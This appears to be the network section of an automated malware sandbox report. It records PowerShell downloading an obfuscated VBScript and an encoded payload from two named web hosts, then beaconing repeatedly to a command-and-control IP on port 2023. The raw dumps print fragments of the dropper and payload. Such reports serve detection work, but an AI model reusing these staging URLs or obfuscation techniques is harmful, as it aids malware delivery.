                                                                                                                                                          Dec 19, 2024 12:51:42.354470968 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:42.354540110 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:42.781550884 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:42.781559944 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:42.781589031 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:42.781637907 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:42.781656027 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:42.781672001 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:42.781677961 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:42.782238007 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:42.783756971 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:42.783776045 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:48.735348940 CET498302023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:51:48.855015039 CET20234983045.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:48.855123997 CET498302023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:51:48.855357885 CET498302023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:51:48.974822044 CET20234983045.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:53.728828907 CET498302023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:51:53.890403032 CET20234983045.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:58.742336988 CET498562023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:51:58.862072945 CET20234985645.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:58.862184048 CET498562023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:51:58.862453938 CET498562023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:51:58.983172894 CET20234985645.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:52:03.762490988 CET498562023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:03.922396898 CET20234985645.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:52:08.773363113 CET498822023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:08.893017054 CET20234988245.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:52:08.895910025 CET498822023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:08.899801016 CET498822023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:09.019386053 CET20234988245.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:52:10.747983932 CET20234983045.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:52:10.748074055 CET498302023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:13.795804977 CET498822023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:13.958338022 CET20234988245.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:52:18.788975000 CET499032023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:18.908564091 CET20234990345.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:52:18.909400940 CET499032023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:18.909864902 CET499032023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:19.268775940 CET20234990345.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:52:20.794996977 CET20234985645.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:52:20.795069933 CET498562023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:23.813200951 CET499032023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:23.974287987 CET20234990345.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:52:28.804750919 CET499272023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:28.924518108 CET20234992745.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:52:28.927958012 CET499272023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:28.928195000 CET499272023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:29.047842026 CET20234992745.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:52:30.779624939 CET20234988245.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:52:30.779684067 CET498822023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:33.812129974 CET499272023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:33.978265047 CET20234992745.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:52:38.804598093 CET499492023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:38.924396992 CET20234994945.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:52:38.924501896 CET499492023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:38.924750090 CET499492023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:39.044329882 CET20234994945.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:52:40.796080112 CET20234990345.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:52:40.796174049 CET499032023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:43.807327986 CET499492023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:43.974457979 CET20234994945.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:52:48.804878950 CET499742023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:48.924596071 CET20234997445.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:52:48.924669027 CET499742023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:48.925013065 CET499742023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:49.044775009 CET20234997445.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:52:51.085143089 CET20234992745.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:52:51.085227013 CET499272023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:54.565159082 CET499742023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:54.726500034 CET20234997445.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:52:59.570755005 CET500002023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:59.691267967 CET20235000045.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:52:59.691356897 CET500002023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:59.691520929 CET500002023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:52:59.811045885 CET20235000045.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:53:00.858151913 CET20234994945.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:53:00.858242035 CET499492023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:53:04.569989920 CET500002023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:53:04.734285116 CET20235000045.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:53:09.586611986 CET500212023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:53:09.706299067 CET20235002145.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:53:09.706388950 CET500212023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:53:09.706538916 CET500212023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:53:09.825972080 CET20235002145.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:53:10.842494965 CET20234997445.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:53:10.843235016 CET499742023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:53:14.601437092 CET500212023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:53:14.762291908 CET20235002145.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:53:19.601327896 CET500462023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:53:19.720829010 CET20235004645.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:53:19.721016884 CET500462023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:53:19.721016884 CET500462023192.168.2.445.149.241.141
                                                                                                                                                          Dec 19, 2024 12:53:19.840589046 CET20235004645.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:53:21.608321905 CET20235000045.149.241.141192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:53:21.608408928 CET500002023192.168.2.445.149.241.141

                                                                                                                                                          UDP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Dec 19, 2024 12:50:47.980000973 CET5023953192.168.2.41.1.1.1
                                                                                                                                                          Dec 19, 2024 12:50:48.119019985 CET53502391.1.1.1192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:50:55.613214970 CET5833053192.168.2.41.1.1.1
                                                                                                                                                          Dec 19, 2024 12:50:56.213932991 CET53583301.1.1.1192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:12.778992891 CET5579853192.168.2.41.1.1.1
                                                                                                                                                          Dec 19, 2024 12:51:13.722399950 CET53557981.1.1.1192.168.2.4

                                                                                                                                                          DNS Queries

                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                          Dec 19, 2024 12:50:47.980000973 CET192.168.2.41.1.1.10xda4cStandard query (0)www.astenterprises.com.pkA (IP address)IN (0x0001)false
                                                                                                                                                          Dec 19, 2024 12:50:55.613214970 CET192.168.2.41.1.1.10x5a3aStandard query (0)www.tdejb.comA (IP address)IN (0x0001)false
                                                                                                                                                          Dec 19, 2024 12:51:12.778992891 CET192.168.2.41.1.1.10x7e7eStandard query (0)www.ftsengineers.comA (IP address)IN (0x0001)false

                                                                                                                                                          DNS Answers

                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                          Dec 19, 2024 12:50:48.119019985 CET1.1.1.1192.168.2.40xda4cNo error (0)www.astenterprises.com.pkastenterprises.com.pkCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Dec 19, 2024 12:50:48.119019985 CET1.1.1.1192.168.2.40xda4cNo error (0)astenterprises.com.pk107.161.23.150A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 19, 2024 12:50:50.595736027 CET1.1.1.1192.168.2.40xbe9cNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 19, 2024 12:50:50.595736027 CET1.1.1.1192.168.2.40xbe9cNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 19, 2024 12:50:56.213932991 CET1.1.1.1192.168.2.40x5a3aNo error (0)www.tdejb.comtdejb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Dec 19, 2024 12:50:56.213932991 CET1.1.1.1192.168.2.40x5a3aNo error (0)tdejb.com202.71.109.228A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 19, 2024 12:51:02.708759069 CET1.1.1.1192.168.2.40xe442No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Dec 19, 2024 12:51:02.708759069 CET1.1.1.1192.168.2.40xe442No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 19, 2024 12:51:02.708759069 CET1.1.1.1192.168.2.40xe442No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 19, 2024 12:51:02.708759069 CET1.1.1.1192.168.2.40xe442No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 19, 2024 12:51:13.722399950 CET1.1.1.1192.168.2.40x7e7eNo error (0)www.ftsengineers.comftsengineers.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Dec 19, 2024 12:51:13.722399950 CET1.1.1.1192.168.2.40x7e7eNo error (0)ftsengineers.com103.53.42.63A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 19, 2024 12:51:36.905293941 CET1.1.1.1192.168.2.40x29a0No error (0)templatesmetadata.office.nettemplatesmetadata.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false

                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                          • www.astenterprises.com.pk
                                                                                                                                                          • www.tdejb.com
                                                                                                                                                          • www.ftsengineers.com

                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          0192.168.2.449730107.161.23.1504437592C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-19 11:50:49 UTC179OUTGET /lm/lm.vbs HTTP/1.1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                          Host: www.astenterprises.com.pk
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          2024-12-19 11:50:49 UTC392INHTTP/1.1 200 OK
                                                                                                                                                          Connection: close
                                                                                                                                                          content-type: text/vbscript
                                                                                                                                                          last-modified: Mon, 16 Dec 2024 01:00:57 GMT
                                                                                                                                                          accept-ranges: bytes
                                                                                                                                                          content-length: 29579
                                                                                                                                                          date: Thu, 19 Dec 2024 11:50:49 GMT
                                                                                                                                                          server: LiteSpeed
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                          2024-12-19 11:50:49 UTC976INData Raw: 0d 0a 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 4b 69 6c 6f 65 6e 65 73 20 3d 20 26 48 32 33 36 34 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 50 72 6f 67 72 61 6d 64 69 73 6b 65 6e 73 20 3d 20 26 48 46 46 46 46 33 43 30 43 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 52 65 6c 69 61 6e 63 65 73 20 3d 20 2d 31 30 36 37 36 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 52 6f 6f 64 6c 65 20 3d 20 22 4e 6f 6e 73 79 6e 63 6f 70 61 74 69 6f 6e 3b 20 66 6c 69 62 62 65 72 74 69 67 69 62 62 65 74 2e 22 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 53 6e 69 74 73 61 61 72 20 3d 20 22 46 61 72 6d 65 72 6e 65 20 73 61 6d 6d 65 6e 73 79 6e 69 6e 67 65 6e 73 22 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 55 6e 73 75 70 65 72 76 69 73 65 64 20 3d 20
                                                                                                                                                          Data Ascii: Private Const Kiloenes = &H2364Private Const Programdiskens = &HFFFF3C0CPrivate Const Reliances = -10676Private Const Roodle = "Nonsyncopation; flibbertigibbet."Private Const Snitsaar = "Farmerne sammensyningens"Private Const Unsupervised =
                                                                                                                                                          2024-12-19 11:50:49 UTC14994INData Raw: 32 31 33 20 3d 20 43 61 6c 6c 69 70 65 72 65 72 32 31 33 20 26 20 22 3b 24 52 65 61 6c 69 77 6f 72 22 0d 0a 27 42 6c 64 73 64 65 6e 68 65 64 65 6e 73 2c 20 73 6a 61 65 6c 20 64 72 69 7a 7a 6c 65 21 0d 0a 43 61 6c 6c 69 70 65 72 65 72 32 31 33 20 3d 20 43 61 6c 6c 69 70 65 72 65 72 32 31 33 20 26 20 22 64 65 77 6f 22 0d 0a 43 61 6c 6c 69 70 65 72 65 72 32 31 33 20 3d 20 43 61 6c 6c 69 70 65 72 65 72 32 31 33 20 26 20 22 72 64 73 22 0d 0a 43 61 6c 6c 69 70 65 72 65 72 32 31 33 20 3d 20 43 61 6c 6c 69 70 65 72 65 72 32 31 33 20 26 20 22 62 65 68 61 22 0d 0a 43 61 6c 6c 69 70 65 72 65 72 32 31 33 20 3d 20 43 61 6c 6c 69 70 65 72 65 72 32 31 33 20 26 20 22 6e 64 6c 65 72 3d 27 43 6c 61 69 72 73 65 6e 22 0d 0a 43 61 6c 6c 69 70 65 72 65 72 32 31 33 20 3d 20 43
                                                                                                                                                          Data Ascii: 213 = Calliperer213 & ";$Realiwor"'Bldsdenhedens, sjael drizzle!Calliperer213 = Calliperer213 & "dewo"Calliperer213 = Calliperer213 & "rds"Calliperer213 = Calliperer213 & "beha"Calliperer213 = Calliperer213 & "ndler='Clairsen"Calliperer213 = C
                                                                                                                                                          2024-12-19 11:50:50 UTC13609INData Raw: 67 65 72 6e 65 3f 20 70 6c 61 6d 61 67 65 72 21 20 75 6e 63 75 73 74 6f 6d 61 62 6c 65 20 66 6c 6a 6c 73 68 61 6e 64 73 6b 65 72 0d 0a 43 61 6c 6c 69 70 65 72 65 72 32 31 33 20 3d 20 43 61 6c 6c 69 70 65 72 65 72 32 31 33 20 26 20 22 73 65 72 65 64 65 73 22 0d 0a 43 61 6c 6c 69 70 65 72 65 72 32 31 33 20 3d 20 43 61 6c 6c 69 70 65 72 65 72 32 31 33 20 26 20 22 29 20 7b 53 61 77 6f 72 64 73 73 77 6f 72 64 22 0d 0a 43 61 6c 6c 69 70 65 72 65 72 32 31 33 20 3d 20 43 61 6c 6c 69 70 65 72 65 72 32 31 33 20 26 20 22 61 77 6f 72 64 69 22 0d 0a 43 61 6c 6c 69 70 65 72 65 72 32 31 33 20 3d 20 43 61 6c 6c 69 70 65 72 65 72 32 31 33 20 26 20 22 73 77 6f 72 64 69 6b 6b 65 6e 20 28 4b 22 0d 0a 43 61 6c 6c 69 70 65 72 65 72 32 31 33 20 3d 20 43 61 6c 6c 69 70 65 72 65
                                                                                                                                                          Data Ascii: gerne? plamager! uncustomable fljlshandskerCalliperer213 = Calliperer213 & "seredes"Calliperer213 = Calliperer213 & ") {Sawordssword"Calliperer213 = Calliperer213 & "awordi"Calliperer213 = Calliperer213 & "swordikken (K"Calliperer213 = Callipere


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1192.168.2.449732202.71.109.2284437968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-19 11:50:57 UTC172OUTGET /kp/Reissuer.xsn HTTP/1.1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                          Host: www.tdejb.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          2024-12-19 11:50:58 UTC183INHTTP/1.1 200 OK
                                                                                                                                                          Date: Thu, 19 Dec 2024 11:50:57 GMT
                                                                                                                                                          Server: Apache
                                                                                                                                                          Last-Modified: Fri, 13 Dec 2024 08:42:08 GMT
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Content-Length: 436400
                                                                                                                                                          Connection: close
                                                                                                                                                          2024-12-19 11:50:58 UTC8009INData Raw: 36 77 4a 2f 49 58 45 42 6d 37 74 64 33 68 55 41 36 77 4c 2f 78 65 73 43 2f 63 59 44 58 43 51 45 63 51 47 62 63 51 47 62 75 55 30 44 67 62 56 78 41 5a 74 78 41 5a 75 42 77 58 39 30 35 56 46 78 41 5a 74 78 41 5a 75 42 36 63 78 33 5a 67 64 78 41 5a 76 72 41 67 2f 51 36 77 4c 6f 35 48 45 42 6d 37 6f 6a 42 41 49 47 63 51 47 62 36 77 4b 70 43 2b 73 43 64 30 4e 78 41 5a 73 78 79 75 73 43 67 48 6a 72 41 6f 75 75 69 52 51 4c 36 77 4b 2b 45 6e 45 42 6d 39 48 69 63 51 47 62 36 77 49 65 36 6f 50 42 42 4f 73 43 31 44 56 78 41 5a 75 42 2b 57 4f 55 32 77 4a 38 79 6e 45 42 6d 2b 73 43 52 6b 65 4c 52 43 51 45 36 77 4a 41 75 2b 73 43 46 2f 57 4a 77 2b 73 43 4b 4c 68 78 41 5a 75 42 77 35 4f 36 70 67 4a 78 41 5a 76 72 41 75 70 6e 75 6f 50 64 45 2f 42 78 41 5a 76 72 41 6e 33
                                                                                                                                                          Data Ascii: 6wJ/IXEBm7td3hUA6wL/xesC/cYDXCQEcQGbcQGbuU0DgbVxAZtxAZuBwX905VFxAZtxAZuB6cx3ZgdxAZvrAg/Q6wLo5HEBm7ojBAIGcQGb6wKpC+sCd0NxAZsxyusCgHjrAouuiRQL6wK+EnEBm9HicQGb6wIe6oPBBOsC1DVxAZuB+WOU2wJ8ynEBm+sCRkeLRCQE6wJAu+sCF/WJw+sCKLhxAZuBw5O6pgJxAZvrAupnuoPdE/BxAZvrAn3
                                                                                                                                                          2024-12-19 11:50:58 UTC8000INData Raw: 4c 38 2f 38 57 71 4a 62 47 39 64 70 4a 4c 35 56 6e 35 76 4e 6b 45 6b 64 6b 5a 4f 4a 62 37 64 54 69 57 2b 33 55 35 4c 49 6f 4d 61 71 6a 62 76 55 2b 46 35 48 6c 30 61 5a 67 55 30 78 2f 76 38 46 33 31 66 42 72 65 68 79 6d 73 6e 4c 70 68 63 53 67 45 54 74 65 48 59 63 69 64 38 37 4a 33 54 66 7a 4f 72 6b 47 6b 44 6c 37 56 31 67 67 59 30 73 57 61 72 34 68 38 66 4c 30 43 4e 4e 36 62 73 6e 44 36 53 30 4a 47 52 39 4a 38 6e 75 2b 55 49 34 70 46 57 6a 66 5a 50 59 70 72 55 45 48 67 52 47 49 79 4c 57 79 50 38 67 50 44 62 31 6e 6e 51 78 7a 32 32 78 56 31 7a 6e 6a 42 4c 4d 78 58 47 2f 31 54 75 62 51 64 63 6a 44 76 6c 48 64 55 37 64 78 6b 4b 74 43 4f 46 31 57 61 2b 50 67 7a 63 4d 51 79 66 2f 44 58 51 30 6f 69 59 79 4b 70 63 30 37 58 4f 74 68 62 52 4d 74 69 52 4a 62 37 64
                                                                                                                                                          Data Ascii: L8/8WqJbG9dpJL5Vn5vNkEkdkZOJb7dTiW+3U5LIoMaqjbvU+F5Hl0aZgU0x/v8F31fBrehymsnLphcSgETteHYcid87J3TfzOrkGkDl7V1ggY0sWar4h8fL0CNN6bsnD6S0JGR9J8nu+UI4pFWjfZPYprUEHgRGIyLWyP8gPDb1nnQxz22xV1znjBLMxXG/1TubQdcjDvlHdU7dxkKtCOF1Wa+PgzcMQyf/DXQ0oiYyKpc07XOthbRMtiRJb7d
                                                                                                                                                          2024-12-19 11:50:59 UTC8000INData Raw: 41 41 41 41 41 41 41 36 47 4f 31 47 45 62 65 7a 39 4e 6b 71 61 43 7a 50 79 73 58 7a 63 41 78 7a 2b 4d 71 65 74 6d 6a 4e 38 73 37 65 79 59 52 6f 5a 6b 6b 4d 59 5a 4a 53 49 68 42 44 75 42 63 6a 42 66 56 46 66 52 33 36 47 4d 54 4d 49 64 4a 7a 2b 4e 37 71 33 35 4f 50 78 73 7a 32 4d 4d 54 7a 39 4d 42 77 73 72 6f 50 79 76 6b 57 39 33 64 78 79 4e 61 72 66 2f 39 57 44 50 2f 4b 78 4f 50 35 33 49 6a 67 49 38 71 34 46 62 62 55 37 7a 64 54 71 77 37 35 45 77 6c 76 6d 57 67 4a 56 50 6e 67 6c 44 4a 79 56 4a 37 44 72 64 78 7a 5a 72 6e 7a 55 39 72 39 57 64 59 6d 48 6f 77 68 58 79 4e 33 42 6c 38 67 64 4a 4b 54 42 32 6b 56 73 55 74 71 36 65 68 35 6b 4a 70 4f 4b 66 4b 73 55 76 77 58 43 36 4e 37 58 73 58 7a 41 6b 46 64 41 64 42 31 67 4a 4e 58 4c 38 35 51 58 6d 65 70 45 38 68
                                                                                                                                                          Data Ascii: AAAAAAA6GO1GEbez9NkqaCzPysXzcAxz+MqetmjN8s7eyYRoZkkMYZJSIhBDuBcjBfVFfR36GMTMIdJz+N7q35OPxsz2MMTz9MBwsroPyvkW93dxyNarf/9WDP/KxOP53IjgI8q4FbbU7zdTqw75EwlvmWgJVPnglDJyVJ7DrdxzZrnzU9r9WdYmHowhXyN3Bl8gdJKTB2kVsUtq6eh5kJpOKfKsUvwXC6N7XsXzAkFdAdB1gJNXL85QXmepE8h
                                                                                                                                                          2024-12-19 11:50:59 UTC8000INData Raw: 67 4d 37 4f 67 58 7a 33 6f 64 53 54 74 53 34 7a 79 47 61 54 64 30 67 5a 64 4a 50 30 68 33 64 54 69 57 2b 33 55 34 6c 76 74 30 75 45 6b 56 36 56 73 52 44 64 54 68 56 6e 68 4b 61 42 79 4a 38 7a 42 4d 74 34 6e 41 50 42 51 47 6d 4a 36 37 5a 54 71 6f 37 4a 55 34 6c 76 6f 37 31 35 2b 43 36 31 4b 52 56 73 61 74 4b 53 56 79 39 2f 78 37 6c 4f 4b 52 4e 2f 36 77 69 50 56 79 4e 65 2b 4c 6c 35 71 79 6c 6d 53 4c 56 69 4e 35 4f 56 4a 53 76 5a 48 2f 5a 37 79 66 55 30 66 6d 49 73 66 32 6b 58 4a 49 61 77 78 37 38 65 58 52 72 74 66 6d 47 51 53 52 4f 35 30 34 6c 76 74 31 4f 4a 62 37 64 54 6b 65 59 6c 44 39 64 44 5a 42 62 38 6a 54 57 5a 6a 65 6a 4d 71 4e 55 74 4f 64 39 52 53 4c 4f 6e 38 34 4b 56 73 50 64 76 74 31 4f 64 77 53 58 41 44 50 70 58 4c 78 42 76 48 73 6a 70 45 79 4a
                                                                                                                                                          Data Ascii: gM7OgXz3odSTtS4zyGaTd0gZdJP0h3dTiW+3U4lvt0uEkV6VsRDdThVnhKaByJ8zBMt4nAPBQGmJ67ZTqo7JU4lvo715+C61KRVsatKSVy9/x7lOKRN/6wiPVyNe+Ll5qylmSLViN5OVJSvZH/Z7yfU0fmIsf2kXJIawx78eXRrtfmGQSRO504lvt1OJb7dTkeYlD9dDZBb8jTWZjejMqNUtOd9RSLOn84KVsPdvt1OdwSXADPpXLxBvHsjpEyJ
                                                                                                                                                          2024-12-19 11:50:59 UTC8000INData Raw: 58 76 68 39 38 47 72 4e 79 47 2b 62 37 58 72 4d 4f 57 44 67 71 62 68 6f 4e 6c 4f 4b 72 2b 41 54 69 57 2b 33 55 34 6c 76 74 31 4f 4a 63 37 69 57 65 2f 54 66 7a 6c 68 2f 64 47 62 76 75 76 55 4e 4e 47 64 72 51 4a 76 6a 68 4c 78 73 42 43 64 32 35 53 6a 6b 34 56 62 38 68 75 63 4f 74 30 59 4b 43 34 33 53 4c 30 6b 76 74 33 30 64 62 46 70 78 69 71 2f 4b 77 55 6c 76 74 31 4f 4a 62 37 64 54 69 58 4d 48 45 4e 68 6b 51 2f 46 32 6f 6c 32 39 76 31 57 75 41 54 67 74 65 78 6d 43 56 37 6f 4f 48 4a 71 33 44 4a 76 64 44 46 39 44 59 72 2b 53 2b 46 35 56 59 54 58 48 59 4a 42 4a 4b 34 77 54 69 57 2b 33 55 34 6c 76 74 31 4f 53 5a 61 5a 64 75 7a 65 37 35 36 58 54 2b 62 4b 77 6b 64 49 4b 79 43 4d 62 48 42 68 52 7a 33 35 6b 61 72 67 6c 36 52 4d 5a 4f 75 6b 78 59 72 78 4f 71 6a 2f
                                                                                                                                                          Data Ascii: Xvh98GrNyG+b7XrMOWDgqbhoNlOKr+ATiW+3U4lvt1OJc7iWe/Tfzlh/dGbvuvUNNGdrQJvjhLxsBCd25Sjk4Vb8hucOt0YKC43SL0kvt30dbFpxiq/KwUlvt1OJb7dTiXMHENhkQ/F2ol29v1WuATgtexmCV7oOHJq3DJvdDF9DYr+S+F5VYTXHYJBJK4wTiW+3U4lvt1OSZaZduze756XT+bKwkdIKyCMbHBhRz35kargl6RMZOukxYrxOqj/
